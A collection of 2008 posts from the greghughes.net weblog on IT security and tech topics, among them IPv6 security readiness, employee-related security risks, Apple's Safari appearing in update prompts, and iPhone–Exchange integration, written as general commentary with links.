greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Call to action: What's your IPv6 threat profile look like? Are you protected? http://www.greghughes.net/rant/PermaLink,guid,fabc7d0b-bc28-4e6b-ae89-4bd450a29678.aspx http://www.greghughes.net/rant/CallToActionWhatsYourIPv6ThreatProfileLookLikeAreYouProtected.aspx Mon, 21 Jul 2008 06:07:02 GMT <p style="clear: both; clear: both; "> Chances are, if you're reading this around the time I am writing it, that your computer is not exposed to an IPv6 network. You're most likely on an IPv4 (classic) network. You can easily tell by trying the quick <a href="http://ipv4.whatismyv6.com/" target="_blank">IPv6 test on this page</a>. <br /> <br /> Even if you're not on the new network stack yet, change is happening, and systems have to be adapted to make sure not only that the new network works (most - but not all - modern hardware and software "understands" IPv6), but also that when you do actually start to operate in an IPv6 world, that you are properly secured. </p> <p style="clear: both; clear: both; "> In an effective security world, you need to put protections in place soon enough, meaning before the threat appears. You have to protect proactively, without waiting for bad guys to exploit a network or system. In the case of the IPv4 to IPv6 transition, that means making sure things like intrusion prevention and detection systems, firewalls, and other software and devices that function in the network layer even know how to "talk" the IPv6 language.<br /> <br /> A number of current security applications just don't know how, so now is the time for a call to action: IPv6-enable your technology right now, to prevent opportune threats in the future. Don't get caught with your pants down.<br /> <br /> Kim Zetter wrote <a href="http://blog.wired.com/27bstroke6/2008/07/the-ghost-in-yo.html" target="_blank">a good article</a> on the subject the other day at WIred. 
"<a href="http://blog.wired.com/27bstroke6/2008/07/the-ghost-in-yo.html" target="_blank">The Ghost in Your Machine: IPv6 Gateway to Hackers</a>" outlines quite well the potential threat imposed by a lack of readiness from a security perspective. It's not all bleak and terrible news, but as the article makes clear, now is the time to fix the problem, before something bad happens.<br /> <br /> Probably the most difficult aspect of understanding the potential issues introduced by an environment not ready for IPv6 is the lack of awareness among IT folk in general as to how IPv6 works, how it's used, and the services (quite good ones, I might add - take a look at how IPsec is baked right in, for example) integral to the protocol.<br /> <br /> What's it take to get from here to there? Being prepared with real, solid and accurate information is probably the most important step. Not many of us are naturally wired to take action before something bad happens. As an IT guy, I can tell you this: In the real world, most IT people don't learn what they need to know until <i>after</i> they need to know it. A lazy learning methodology just won't work in this case.<br /> <br /> For IT professionals, do not assume that just because you were able to pick up your IPv4 knowledge over a long weekend of studying and tinkering that you'll be able to do the same with IPv6 - That's just not the case. IPv6 is more complex and has a lot more parts to understand. If you haven't learned it by now, for shame. Some of you have a little time left. Get on the ball, and gain the deep understanding you need to do your job properly.<br /> <br /> For application and hardware vendors that haven't yet dealt with the IPv6 change, you're running late. While many vendors of firewall software, switched, home routers, etc. have made the proper changes, there are also many that have not. 
Even worse, there are a variety of IPv4-to-IPv6 workarounds that can relatively easily be put in place by unknowing people (read: the IT guys mentioned above) that circumvent firewalls and other protections that are relied upon for good security. Bad design, convenient at the time, disaster waiting to happen. Prevent this.<br /> <br /> If you're an individual computer user or owner, what is the status of your software vendors with regard to dealing with IPv6 network traffic? Are you running the latest firewall software, current router firmware? Do the latest versions protect you in an IPv6 world?<br /> <br /> IPv6 is a great move, and in time it will dramatically change for the better how computers and devices interact. That is, if we don't manage to screw it all up in the process.<br /> <br /> Now is the time. IPv6 is here, Go forth. Learn, analyze and secure. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,fabc7d0b-bc28-4e6b-ae89-4bd450a29678.aspx IT Security Tech
Installers that patch their software before first run - Smart security move
Wed, 16 Jul 2008 00:58:44 GMT

I know this isn't exactly a new thing, but as I was installing the IE8 Beta 1 for x64 architecture on a computer today to do some testing, I felt a warm-fuzzy sense of appreciation for the fact that more and more we are seeing software that checks for patches and updates before installing and running for the first time. It makes for a more secure system, which is nothing but good.

[image: http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/Installersthatpatchtheirsoftwarebeforefi_FCCD/image_2.png]

No matter what you think of Internet Explorer (and for the record/what it's worth, I like it quite a bit these days), you have to admit the safer installation process is a great improvement.
Make you think: Top 10 modern business information security risks
Thu, 03 Jul 2008 06:09:37 GMT

You have firewalls and anti-malware systems, video surveillance and monitoring systems for network traffic to and from the Internet. But look at eWeek's semi-smart list of the top ten infosec risks workers pose to your business today (http://www.eweek.com/c/a/Security/10-Ways-Your-Employees-Pose-a-Security-Risk-for-Your-Organization/), and you may need to rethink your plans.

I call this a "semi-smart" list because it's practical and real-world, and doesn't assume the "standards" out there cover all the bases. But, at the same time it doesn't offer much in the way of solutions, which always frustrates me (and it misses some key points, especially related to intentional worker behavior, as opposed to neglect, and how it can substantially enhance the potential associated with these risks).

Point is, each of the items pointed out is very much worth considering and reviewing in your business security program. Just don't forget to look at them in the big-picture perspective of the business.

And now for the list:

  • USB Flash Drives
  • Laptops
  • P2P
  • Web Mail
  • Wi-Fi
  • Smart Phones
  • Collaboration Tools
  • Social Networks
  • Unauthorized Software Updates
  • Virtual Worlds

Pretty much every modern technical productivity enhancer. Before anyone starts screaming the alarmist song, think about not only how these things can be used for good, but also about how they could be used to do Very Bad Things.

How many of those technologies are specifically covered under your infosec policies, and can that coverage be proven effective? How many have you tested in the real world to see what your compliance profile really looks like? Could you meaningfully test for these threats, even if they were on your plan?

You can check out the eWeek article here: http://www.eweek.com/c/a/Security/10-Ways-Your-Employees-Pose-a-Security-Risk-for-Your-Organization/
Would you trust Twitter to handle money payments?
Tue, 01 Jul 2008 06:06:18 GMT

Nate Westheimer of The Silicon Alley Insider has this to say:

"Twitter should take full advantage of their messaging platform, user base and user disposition to lead in the P2P mobile payments space, where, despite years of hype, no one has much of a head start."

Link to the article: How Twitter Could Be Worth A Billion In A Year (http://www.alleyinsider.com/2008/6/how-twitter-will-be-worth-a-billion-in-a-year)

I have to admit, coming from the Internet financial services space, the thought of this actually happening scares me slightly, given the serious lack of stability and the manner in which changes have been made at Twitter with less than complete communication. But at any rate, they have a lot of money to throw at the problems, so I am rooting for them to get things right. It just hurts. :)

Westheimer makes some good points. Twitter is carrier/provider-agnostic and has amazingly terrific user and market penetration. Just as I send you a direct message today by typing "d yourname hi how are you?" I could pay you using syntax like "p yourname $20."

But getting from here to there is a whole other story. It's far from trivial to create a financial transaction and accounting system, especially one that scales to the sizes required (but it certainly can be done).

It's an appealing and interesting idea and one that warrants some real thought. As someone who comes from the online banking software, infrastructure and security world, I can see the market need as well as the challenges from many fronts that will face any company that finally jumps fully on-board the micro-payments and mobile-payments train. A number of good, well-funded companies have given it a run before with limited success. It's a complex problem to solve, but it's doable.

It sure sounds like a fun challenge, and there's a massive marketplace out there just waiting for someone to get it right. Note the operative verbiage there - doing it well is critical to success. The fact is there's no room for "scale later" in this game.

What do you think? Would you pay people via Twitter if you could? Would it be useful to you?

Forefront Security + NAP Delivers a More-Complete Network Security Picture
Tue, 10 Jun 2008 19:40:24 GMT

Last month, Microsoft released the Microsoft Forefront Integration Kit for Network Access Protection (http://technet.microsoft.com/en-us/library/cc512112.aspx), a solution accelerator that enables their Forefront Client Security products to interoperate with the Network Access Protection (NAP) capabilities included in Windows Server 2008. In a nutshell, it allows an integrated system of policy compliance and real-time checking of a computer's Forefront security status, as well as remediation and access protection for machines that fall or are found to be out of compliance.

Using the technologies together, administrators can leverage the state of a client computer as part of the information and policy status that NAP leverages in controlling access to the network.

"You can use the Kit to help protect your network infrastructure by configuring a Forefront Client Security compliance health policy across your network, monitoring the operational health of Forefront Client Security in real time, and remediating problems that arise."

More and better in-depth defense mechanisms, and ones that work well together on top of that, are good to see coming out of Microsoft and others. It's the kind of progress that's needed to stay on top of quickly evolving threats, and to proactively keep them from spreading.

(via Dan Griffin, http://www.jwsecure.com/dan/2008/06/04/forefrontnap-solution-is-now-live/)
I have a dream: The perfect gigabit wireless router with VPN and QOS
Sat, 26 Apr 2008 21:36:17 GMT

I'm pulling my hair out (what I have left, anyhow) trying to find a good home/home office wireless router that includes all the features I need. Granted, I'm a bit of a power user, but I'm honestly a bit surprised I can't find what I want out there somewhere. You'd think someone would build it. My list of features and performance requirements includes:

  • Gigabit WAN and LAN ports - and needs to have four LAN ports
  • VPN capability that I can use cross-platform - an SSL VPN might be the best option, but whatever works well and lets me connect with Windows, Mac, etc. is what really matters to me
  • Working, reliable and effective QOS - routers I have used in the past have either been terrible or mediocre at properly shaping and allocating traffic for VoIP and other services
  • Reliable and full-featured administrative capabilities in firmware
  • Quiet, reliable hardware
  • IPv6 support
  • Wireless-N

Until recently, I have been using a D-Link DIR-625 router (http://www.greghughes.net/rant/DLinkDIR625RangeBoosterWirelessRouter.aspx), which has been stable and reliable. But it's a 100-megabit device and the QOS is marginal for VoIP traffic in my experience. Plus the firmware has not been updated recently and there is no VPN capability. It's rock-solid at what it does, though. I've only had to reset it a couple times since I have had it.

I've looked at the D-Link DIR-655 router (http://www.dlink.com/products/?pid=530), which is their currently-touted gigabit version of the 625 model. It's still on my list of possible solutions, but with no VPN it doesn't meet all my needs, and D-Link doesn't seem to have one that includes all the features.

Yesterday I picked up a VPN router with gigabit and QOS made by Linksys, the WRVS4400N (http://www.linksys.com/servlet/Satellite?c=L_Product_C2&childpagename=US%2FLayout&cid=1154659754557&pagename=Linksys%2FCommon%2FVisitorWrapper). It's not cheap and honestly I'm not sure why I allowed myself to buy a Linksys product after all the headaches I have had with them before. The net result of the past 12 hours of use is that I'm going to return it today. Between the slow reboots required with every other change I make and the lack of capabilities in the software (and some stuff that just doesn't work), it's already frustrating me. D-Link has seriously spoiled me in the Admin interface/firmware capabilities department, even without releasing any updates. Add to that the high-pitched whine the Linksys router makes and the heat it generates when plugged in and there's just no way. The whine is pretty awful, and gives me a serious headache within minutes if I am near it. Back to the store it goes.

So, I am left without a solution that meets all my needs. I may just have to pick up the D-Link DIR-655 and live without VPN and then find a separate VPN solution, but I don't want to if I don't have to. Any ideas anyone? Is there an option out there that will meet my needs and expectations?
Fact and Myths about IPv6 - Interview with Sean Siler
http://www.greghughes.net/rant/PermaLink,guid,9ecb14e4-b2ef-4408-b62c-4b443268373c.aspx
Fri, 18 Apr 2008 18:06:20 GMT

IPv6 has been around for something on the order of 15 years, yet it has still not seen widespread adoption. It was recently enabled on the Internet's core DNS infrastructure, and has been adopted in some networks, like those operated by certain mobile carriers. The current IP addressing and allocation scheme, dubbed IPv4, will eventually run out of IP addresses. There's been a sort of boy-who-cried-wolf debate over whether we're really going to allocate the entire IPv4 address space anytime soon or not. But eventually we'll run out - some say in 2010.

Sean Siler (http://blogs.technet.com/ipv6/), Program Manager responsible for IPv6, joined Richard Campbell and me for a RunAs Radio show (http://www.runasradio.com/default.aspx?showNum=53). Sean really knows his stuff and did a terrific job of describing IPv6, comparing it to IPv4, and covering other useful information.

IPv6 enables a lot more than just additional addresses, though. Sean discusses what's the same, what's different and what's new (hint: IPsec and multicasting everywhere). He also offers a great analogy to describe the enormous size of the IPv6 address space. It's mind-boggling, really.

If you don't understand or know much about IPv6, this interview is a great place to start learning, and you truly need to be doing so if you do network design or other such work in your job. The change is significant, but not impossible - so go listen to the show (http://www.runasradio.com/default.aspx?showNum=53) and get learning!

Other resources:

- IPv6 information on Wikipedia: http://en.wikipedia.org/wiki/IPv6
- IPv6 info from Microsoft: http://www.microsoft.com/ipv6
- Sean Siler's IPv6 blog: http://blogs.technet.com/ipv6/

Categories: IT Security, RunAs Radio, Tech
Cleaning Malware on Windows - A lesson by Mark Russinovich
http://www.greghughes.net/rant/PermaLink,guid,3518bde8-25b7-4709-b240-626c1ffee982.aspx
Mon, 07 Apr 2008 06:16:56 GMT

Mark Russinovich (http://blogs.technet.com/markrussinovich/), a Microsoft Technical Fellow, presented a very good session at the TechEd IT Forum last year on the topic of advanced eradication of malware on Windows machines. It's a great session and has some useful advanced techniques for removal. It is also a very good resource for those who want to better understand how malware infects a machine and what some of the risks are. Lots of practical information and how-to's in this one.

Fortunately, the session was recorded and is available online (http://www.microsoft.com/emea/spotlight/sessionh.aspx?videoid=359) for anyone who wants to see it. If viruses and malware are a part of your job, or if this type of security topic is of interest to you, it's an hour and twelve minutes well spent. I went looking for this session online hoping to find the PowerPoint and found the whole session with video and demo and everything - terrific stuff.

(Updated 4/7 - link to video fixed)

Categories: IT Security, Safe Computing, Tech
Safari magically installing on Windows? Just say "no" if you don't want it...
http://www.greghughes.net/rant/PermaLink,guid,2e5be256-2fba-40d1-815a-eb45c023f33d.aspx
Fri, 21 Mar 2008 20:47:04 GMT

Got iTunes, or anything else Apple on your Windows computer? If so, when the Apple software checks for updates, you'll probably see an option (which is enabled by default) to install Safari - even if you don't already have it installed on your computer. Safari is Apple's default web browser (and actually not a bad one at that). But since people are used to seeing - well - updates when the software checks for updates, you might not realize you're installing new software.

[Screenshot: AppleUpdateSafari1 - http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/SafarimagicallyinstallingonWindowsJusts_C1D3/AppleUpdateSafari1_2.jpg]

Just making sure you're paying attention here, is all.

Sure enough, when I check for updates on my Windows machine, where Safari has never been installed, I'm presented with the option to install it...

[Screenshot: AppleUpdateSafari2 - http://www.greghughes.net/rant/content/binary/WindowsLiveWriter/SafarimagicallyinstallingonWindowsJusts_C1D3/AppleUpdateSafari2_2.jpg]

As Tom Krazit tells us... Just un-check the box (http://www.news.com/8301-13579_3-9900727-37.html) if you don't want to install Safari. Simple as that.

"It seems that at some point people became conditioned to downloading anything that shows up from an official source, like Microsoft, Apple, AOL, Yahoo, or whoever. Remember, it's your PC; spend your installation capital wisely." (link: http://www.news.com/8301-13579_3-9900727-37.html)

It's always important to pay attention to what you're clicking on. Fact is, Apple's probably counting on a significant number of people just clicking without thinking - and that's indicative of a whole slew of problems, with users, companies, you name it.

For my part, I made the educated decision to install it. I actually kind of like Safari on the Mac, so I'm interested in trying it on Windows.

Categories: Apple, IT Security, Tech, Things that Suck
iPhone and Exchange to play nicely together - and security will be greatly improved
http://www.greghughes.net/rant/PermaLink,guid,af212632-177f-491c-a08e-d75626c70435.aspx
Fri, 07 Mar 2008 01:00:07 GMT

Microsoft (http://www.microsoft.com/Presspass/Features/2008/mar08/03-06EASqa.mspx) and Apple (http://www.apple.com/pr/library/2008/03/06iphone.html) have announced that they are working together to make Exchange Server and the iPhone work well together. Apple will license Exchange ActiveSync for use on the iPhone, which will in turn help assure that Exchange Server's dominance in the marketplace stays the way it is. It's really as simple as that.

The fact is that Exchange is a pretty terrific server product for email, calendaring and a lot more. The iPhone is a pretty terrific mobile device. They don't integrate too terribly well today: You can sync your calendar and contacts via the USB connection to your computer, and you can get IMAP email from a properly-configured Exchange server (which works, but is not exactly optimal). But it's far from simple, far from seamless, and far from supportable in the enterprise.

One has to wonder what this means, either directly or indirectly, for the Windows Mobile world. I know the arguments: Different markets, different platforms, different purposes, etc. etc. etc... but with the iPhone SDK availability, that gap will be much narrower. And the fact of the matter is, Apple has the usability nailed with the iPhone. Sure, there are a few enhancements needed. But those are ones that can (and I'm certain will) be done.

ActiveSync will provide the ability (assuming Apple leverages all the features) to do push email, calendar and contact sync over the air, and task list sync.

Perhaps one of the more important potential benefits from ActiveSync integration with the iPhone is the ability to get enterprise-class security on the device, which to date is lacking (http://www.greghughes.net/rant/ThinkingAboutUsingIPhonesAtYourCompanyThinkAgainIfYouCareAboutSecurity.aspx) and doesn't meet the needs or standards of most commercial IT departments. Exchange 2007 clients can be set up for enforced enterprise IT "policies" (http://msexchangeteam.com/archive/2007/11/19/447551.aspx) or controls, which would go a long way toward satisfying those security needs. In my mind, that's the biggest potential win. Without that, pushing email and syncing calendars and contacts is too risky an activity.

From Apple's press release come details of what they intend to provide - and it looks like Cisco VPNs are in the package, as well:

"Apple has licensed Exchange ActiveSync from Microsoft and is building it right into the iPhone, so that iPhone will connect out-of-the-box to Microsoft Exchange Servers 2003 and 2007 for secure over-the-air push email, contacts, calendars and global address lists. Built-in Exchange ActiveSync support also enables security features such as remote wipe, password policies and auto-discovery. The iPhone 2.0 software supports Cisco IPsec VPN to ensure the highest level of IP-based encryption available for transmission of sensitive corporate data, as well as the ability to authenticate using digital certificates or password-based, multi-factor authentication. The addition of WPA2 Enterprise with 802.1x authentication enables enterprise customers to deploy iPhone and iPod touch with the latest standards for protection of Wi-Fi networks.

The iPhone 2.0 software provides a configuration utility that allows IT administrators to easily and quickly set up many iPhones, including password policies, VPN settings, installing certificates, email server settings and more. Once the configuration is defined it can be easily and securely delivered via web link or email to the user. To install, all the user has to do is authenticate with a user ID or password, download the configuration and tap install. Once installed, the user will have access to all their corporate IT services."

Good move Apple. Good move Microsoft. Looking forward to this one!

Categories: IT Security, Mobile, Tech